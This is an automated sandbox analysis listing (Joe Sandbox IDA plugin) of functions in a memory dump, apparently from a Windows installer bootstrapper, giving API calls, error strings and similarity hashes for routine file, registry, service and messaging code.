Function 000C120A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,000C523F,00000000,?), ref: 000C1248
GetLastError.KERNEL32(?,?,?,000C523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 000C1252

Strings

ignored , xrefs: 000C1217
apputil.cpp, xrefs: 000C1273

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ArgvCommandErrorLastLine
String ID: apputil.cpp$ignored
API String ID: 3459693003-568828354
Opcode ID: c88310114cc8784732f02ea4ebc0b55db828038d8c71f5f722b3358e444c0642
Instruction ID: cdc91697c9bf7792f9fb72d7c13121b41f387f55a41193ba0ed727d6790ec5a1
Opcode Fuzzy Hash: c88310114cc8784732f02ea4ebc0b55db828038d8c71f5f722b3358e444c0642
Instruction Fuzzy Hash: BA11907A901229EBCB21DB99C845EDFBBA8EF06750F010199BC00E7252D771DE10DAA0

Function 000ED1B3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,00000002,00000000,?,?,000ED3EE,00000000,00000000,00000000,?), ref: 000ED1C3
ReleaseMutex.KERNEL32(?,?,000ED3EE,00000000,00000000,00000000,?), ref: 000ED24A

Part of subcall function 000C394F: GetProcessHeap.KERNEL32(?,000001C7,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3960
Part of subcall function 000C394F: RtlAllocateHeap.NTDLL(00000000,?,000C2274,000001C7,00000001,80004005,8007139F,?,?,00100267,8007139F,?,00000000,00000000,8007139F), ref: 000C3967

Strings

NetFxChainer.cpp, xrefs: 000ED208
Failed to allocate memory for message data, xrefs: 000ED212

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$AllocateMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate memory for message data$NetFxChainer.cpp
API String ID: 2993511968-1624333943
Opcode ID: 5fcd93d49f82cbb87116e2acccdd0834df7de86eeac2f207d842c37d7a21ca94
Instruction ID: 56b9ae5e5213e277c0df87134ebe1ee663a306f9922ad33a02215a221c75f115
Opcode Fuzzy Hash: 5fcd93d49f82cbb87116e2acccdd0834df7de86eeac2f207d842c37d7a21ca94
Instruction Fuzzy Hash: 90118FB1200215AFCB159F64E885E6AB7F4FF49720B104269F9149B7A2C771A820CB94

Function 000C1F69 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON

Download Yara Rule

APIs

FormatMessageW.KERNEL32(000C428F,000C548E,?,00000000,00000000,00000000,?,80070656,?,?,?,000DE75C,00000000,000C548E,00000000,80070656), ref: 000C1F9A
GetLastError.KERNEL32(?,?,?,000DE75C,00000000,000C548E,00000000,80070656,?,?,000D40BF,000C548E,?,80070656,00000001,crypt32.dll), ref: 000C1FA7
LocalFree.KERNEL32(00000000,?,00000000,00000000,?,?,?,000DE75C,00000000,000C548E,00000000,80070656,?,?,000D40BF,000C548E), ref: 000C1FEE

Strings

strutil.cpp, xrefs: 000C1FCB

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorFormatFreeLastLocalMessage
String ID: strutil.cpp
API String ID: 1365068426-3612885251
Opcode ID: 5b786359e74177ffeaebb54f3bc85f46c7fe48d4a025e4a37d4630057822591b
Instruction ID: d9e5fcd6f149d0b3c03180c1e2a9ae27ca62b7c30243901c59137a34dae1bfa5
Opcode Fuzzy Hash: 5b786359e74177ffeaebb54f3bc85f46c7fe48d4a025e4a37d4630057822591b
Instruction Fuzzy Hash: 4F018BB690012AFBDB209F94CC09EDFBAACEB05710F004169BD00E6251E7708E009AE0

Function 000D0721 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00100F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0012AAA0,00000000,?,001057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00100F80

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,00000001,00000000), ref: 000D0791

Strings

Failed to update name and publisher., xrefs: 000D077B
Failed to update resume mode., xrefs: 000D0762
Failed to open registration key., xrefs: 000D0748

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseOpen
String ID: Failed to open registration key.$Failed to update name and publisher.$Failed to update resume mode.
API String ID: 47109696-1865096027
Opcode ID: a895d4a5fcd3c67908fcd3c5c0131c4aa3e3733e49d97ef3123fa7cc832e2270
Instruction ID: f8550bf281fc37980cc4a9d7a1f5c9b3bebb7cb083c1e4d4cec8bf446bae272a
Opcode Fuzzy Hash: a895d4a5fcd3c67908fcd3c5c0131c4aa3e3733e49d97ef3123fa7cc832e2270
Instruction Fuzzy Hash: 8901FC32D44329F7CB225694DC45FEEB779AF14B20F104156F904BA250C7B2BE50ABE4

Function 00104DB3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(0010B500,40000000,00000001,00000000,00000002,00000080,00000000,000D04BF,00000000,?,000CF4F4,?,00000080,0010B500,00000000), ref: 00104DCB
GetLastError.KERNEL32(?,000CF4F4,?,00000080,0010B500,00000000,?,000D04BF,?,00000094,?,?,?,?,?,00000000), ref: 00104DD8
CloseHandle.KERNEL32(00000000,00000000,?,000CF4F4,?,000CF4F4,?,00000080,0010B500,00000000,?,000D04BF,?,00000094), ref: 00104E2C

Strings

fileutil.cpp, xrefs: 00104DFC

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID: fileutil.cpp
API String ID: 2528220319-2967768451
Opcode ID: a66c669bde23de69d479850480808fb03c85952c1e02b6eb73021d71a6b40eea
Instruction ID: 060dea235844a54565767093c955360a9d3dc537febf3b4965c267de886f3b23
Opcode Fuzzy Hash: a66c669bde23de69d479850480808fb03c85952c1e02b6eb73021d71a6b40eea
Instruction Fuzzy Hash: 8701D473641125ABD7325AA9DC89F9F3A64AB41B71F024310FFA0AB1D0D7F48C5192E0

Function 0010497A Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000080,00000001,00000000,00000003,00000080,00000000,000002C0,00000000,?,000E8C76,00000000,00000088,000002C0,BundleCachePath,00000000), ref: 001049AE
GetLastError.KERNEL32(?,000E8C76,00000000,00000088,000002C0,BundleCachePath,00000000,000002C0,BundleVersion,000000B8,000002C0,EngineVersion,000002C0,000000B0), ref: 001049BB

Strings

fileutil.cpp, xrefs: 0010498F, 001049DF

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: CreateErrorFileLast
String ID: fileutil.cpp
API String ID: 1214770103-2967768451
Opcode ID: 8c1a070ab4d9450f0355ed6360b0b7cb2f8a5323abd231ef0f3e64843c344ad4
Instruction ID: 1ce7d46db44e1b8fb339e83551ae42f617635c619293623e61dd73e64f63a457
Opcode Fuzzy Hash: 8c1a070ab4d9450f0355ed6360b0b7cb2f8a5323abd231ef0f3e64843c344ad4
Instruction Fuzzy Hash: 3A01F973680235F7E73126956C8AFAF2568AB04B74F124221FFD1BB1D0CBE55D5092E0

Function 000E6BEB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49serviceCOMMON

Download Yara Rule

APIs

ControlService.ADVAPI32(000E6AFD,00000001,?,00000001,00000000,?,?,?,?,?,?,000E6AFD,00000000), ref: 000E6C13
GetLastError.KERNEL32(?,?,?,?,?,?,000E6AFD,00000000), ref: 000E6C1D

Strings

Failed to stop wusa service., xrefs: 000E6C4B
msuengine.cpp, xrefs: 000E6C41

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ControlErrorLastService
String ID: Failed to stop wusa service.$msuengine.cpp
API String ID: 4114567744-2259829683
Opcode ID: ba9074e8bea1e9dc5d0728bb025809379856eb330a5d2c31e4a3e4055c60f89d
Instruction ID: 06bf1a8c74d1f0e0a517247e8103d37963141cd903c29c8822256a57eb811a96
Opcode Fuzzy Hash: ba9074e8bea1e9dc5d0728bb025809379856eb330a5d2c31e4a3e4055c60f89d
Instruction Fuzzy Hash: 93012B73A452786BD720DBA5BC45BEFB7E4EF08B60F114029FD40BB280DB659C4186E4

Function 000DECC5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009002,00000000,?), ref: 000DECED
GetLastError.KERNEL32 ref: 000DECF7

Strings

Failed to post elevate message., xrefs: 000DED25
EngineForApplication.cpp, xrefs: 000DED1B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post elevate message.
API String ID: 2609174426-4098423239
Opcode ID: 5f9f0d74ed778d36bc9990f4048e4aca0653bca52f0abcbf52caaa1a9b25ed07
Instruction ID: 41414953a308a62ff266739593b03da2e350e0fc7f924c12085c4b8334bacb65
Opcode Fuzzy Hash: 5f9f0d74ed778d36bc9990f4048e4aca0653bca52f0abcbf52caaa1a9b25ed07
Instruction Fuzzy Hash: 7DF0FC336443316BC7306694DC09B8B7B94BF04B70B258125FE54AF2C1DB65CC0182E0

Function 000CD8DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,BootstrapperApplicationDestroy), ref: 000CD903
FreeLibrary.KERNEL32(?,?,000C48D7,00000000,?,?,000C548E,?,?), ref: 000CD912
GetLastError.KERNEL32(?,000C48D7,00000000,?,?,000C548E,?,?), ref: 000CD91C

Strings

BootstrapperApplicationDestroy, xrefs: 000CD8FB

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: AddressErrorFreeLastLibraryProc
String ID: BootstrapperApplicationDestroy
API String ID: 1144718084-3186005537
Opcode ID: a0c04a950be662f2b73471d50c42153595b4a5db98d26d4952ec676461ee36f2
Instruction ID: d082d690fff31e7e206788f7b097aa8f22411f1a17a6d59a1e70801d5190b352
Opcode Fuzzy Hash: a0c04a950be662f2b73471d50c42153595b4a5db98d26d4952ec676461ee36f2
Instruction Fuzzy Hash: 21F04F36600626ABC3254F6AD804F2AF7F4FF04B62701823AB865D6920D771EC508BD0

Function 000DF2D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009001,00000000,?), ref: 000DF2EE
GetLastError.KERNEL32 ref: 000DF2F8

Strings

EngineForApplication.cpp, xrefs: 000DF31C
Failed to post plan message., xrefs: 000DF326

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post plan message.
API String ID: 2609174426-2952114608
Opcode ID: ec462f2cef1ec2ef02a7877c3d41fbd13bb944488e9d113a8bdaa72e2c566d92
Instruction ID: 3f21bf2fe5cafaa55bf0c1bfe79c77ef6628feee0c8f11189348f89ac972dd7a
Opcode Fuzzy Hash: ec462f2cef1ec2ef02a7877c3d41fbd13bb944488e9d113a8bdaa72e2c566d92
Instruction Fuzzy Hash: C2F0A7336453326BD6352A955C09E9B7FD4EF04B60B028025BD54AF291DB61DD4081E0

Function 000DF3E7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009005,?,00000000), ref: 000DF3FC
GetLastError.KERNEL32 ref: 000DF406

Strings

EngineForApplication.cpp, xrefs: 000DF42A
Failed to post shutdown message., xrefs: 000DF434

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post shutdown message.
API String ID: 2609174426-188808143
Opcode ID: ba9b699360e779bc19ce0225d44d02c113a8e2c02bf577d93f8d76bb450948b9
Instruction ID: 1d894dd79dad592f92c3bd793c2d19cae5979fc87d9c293f71125710d6632e73
Opcode Fuzzy Hash: ba9b699360e779bc19ce0225d44d02c113a8e2c02bf577d93f8d76bb450948b9
Instruction Fuzzy Hash: 00F0A033A4533677C6311A956C0AF9B7F94BF04B60B028036BE54BB692E7A1DC4086E4

Function 000E07B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(0010B478,00000000,?,000E1717,?,00000000,?,000CC287,?,000C5405,?,000D75A5,?,?,000C5405,?), ref: 000E07BF
GetLastError.KERNEL32(?,000E1717,?,00000000,?,000CC287,?,000C5405,?,000D75A5,?,?,000C5405,?,000C5445,00000001), ref: 000E07C9

Strings

cabextract.cpp, xrefs: 000E07ED
Failed to set begin operation event., xrefs: 000E07F7

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorEventLast
String ID: Failed to set begin operation event.$cabextract.cpp
API String ID: 3848097054-4159625223
Opcode ID: b25b4df42cd1c78b77b494cbdd0d9840a37ad13cb19df5e03e7bd1c4e5640b02
Instruction ID: f92eb7dc4937840b650ed22f53bf1ad32684de1002cffbb771dd827f3d48f4d7
Opcode Fuzzy Hash: b25b4df42cd1c78b77b494cbdd0d9840a37ad13cb19df5e03e7bd1c4e5640b02
Instruction Fuzzy Hash: A0F05C339472316BD22112965D05BCF7A849F04B70B014135FE80BB240EB90AC80C2D5

Function 000DEBCB Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009003,00000000,?), ref: 000DEBE0
GetLastError.KERNEL32 ref: 000DEBEA

Strings

EngineForApplication.cpp, xrefs: 000DEC0E
Failed to post apply message., xrefs: 000DEC18

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post apply message.
API String ID: 2609174426-1304321051
Opcode ID: 2d7f91cdd7e7a75dc3baf4432f36ce9686999cd20daaaed4b90f070d775cc216
Instruction ID: ec3749b9b5a7310a498957293495ca778265785b923afd655ac844d779a8950e
Opcode Fuzzy Hash: 2d7f91cdd7e7a75dc3baf4432f36ce9686999cd20daaaed4b90f070d775cc216
Instruction Fuzzy Hash: 5EF0A033A55335B7D63126959C0DE8BBFD8EF04BB0B028025FE58AE281D7A1DC4082E4

Function 000DEC5C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 000DEC71
GetLastError.KERNEL32 ref: 000DEC7B

Strings

Failed to post detect message., xrefs: 000DECA9
EngineForApplication.cpp, xrefs: 000DEC9F

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ErrorLastMessagePostThread
String ID: EngineForApplication.cpp$Failed to post detect message.
API String ID: 2609174426-598219917
Opcode ID: 8cfbfd08edc198bcd0e585e8569b012869a1d99e106edd854af58ea1adff57f3
Instruction ID: 68cd4e7d2317e6fa9adce4d3d7daac72aaf983a61f2aca84096e63228eb778cc
Opcode Fuzzy Hash: 8cfbfd08edc198bcd0e585e8569b012869a1d99e106edd854af58ea1adff57f3
Instruction Fuzzy Hash: 3AF0A73365533167D63567959C09F8B7F94FF04B71B124021BD58AE282D761DC00C5E4

Function 000F6B76 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 000F6C01
__alldvrm.LIBCMT ref: 000F6E02
__alldvrm.LIBCMT ref: 000F6E24

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
Instruction ID: 64172180c714ff1e832b321846f82fc8ff62808d9e365cd92bc047ce6e86a076
Opcode Fuzzy Hash: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
Instruction Fuzzy Hash: 0FA14776E0038E9FDB21CF28C8917BEBBE5EF51310F18416DE6859B682C6368D41E791

Function 00105EC5 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 163stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?), ref: 00105F92
lstrlenW.KERNEL32(00000000), ref: 00105FAA

Strings

dlutil.cpp, xrefs: 00106033

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: lstrlen
String ID: dlutil.cpp
API String ID: 1659193697-2067379296
Opcode ID: 10a567039e500361a99481c0024147b885ef0a218fac2de618bab182230e6059
Instruction ID: 0568dc4cd0ecab814b2d5370c5d5913ed2a1af6f39d040942456caa9d5ee3e9f
Opcode Fuzzy Hash: 10a567039e500361a99481c0024147b885ef0a218fac2de618bab182230e6059
Instruction Fuzzy Hash: 4B51D47290162AEBDB219FA48C809AFBBBAEF88710F154114FD40B7280D7B5DD519FA0

Function 000F922B Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,000F2444,00000000,00000000,000F3479,?,000F3479,?,00000001,000F2444,ECE85006,00000001,000F3479,000F3479), ref: 000F9278
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000F9301
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 000F9313
__freea.LIBCMT ref: 000F931C

Part of subcall function 000F521A: HeapAlloc.KERNEL32(00000000,?,?,?,000F1F87,?,0000015D,?,?,?,?,000F33E0,000000FF,00000000,?,?), ref: 000F524C

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644230284.000000000012A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644257491.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c0000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharMultiWide$AllocHeapStringType__freea
String ID:
API String ID: 573072132-0
Opcode ID: 05a0299349577d0717be85b0d39920c4f2af4f963c2770f89656c463cbf15f7d
Instruction ID: 94d04cd45c2d16fb7d6af868174ca0de6ce0380ef3a4aa4524bf2f6ffc777a10
Opcode Fuzzy Hash: 05a0299349577d0717be85b0d39920c4f2af4f963c2770f89656c463cbf15f7d
Instruction Fuzzy Hash: D6318932A0020AABDB259F65DC85EFE7BA5EB40710B090128FD14D7695EB35CD91EBA0

Function 000C4FA4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,00000000,?,000C5552,?,?,?,?,?,?), ref: 000C4FFE
DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,000C5552,?,?,?,?,?,?), ref: 000C5012
TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000C5552,?,?), ref: 000C5101
DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000C5552,?,?), ref: 000C5108

Part of subcall function 000C1161: LocalFree.KERNEL32(?,?,000C4FBB,?,00000000,?,000C5552,?,?,?,?,?,?), ref: 000C116B

Memory Dump Source

Source File: 00000000.00000002.1644155778.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000000.00000002.1644121649.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1644204685.000000000010B000.00000002.00000001.01000000.00000003.sdmpDownload File
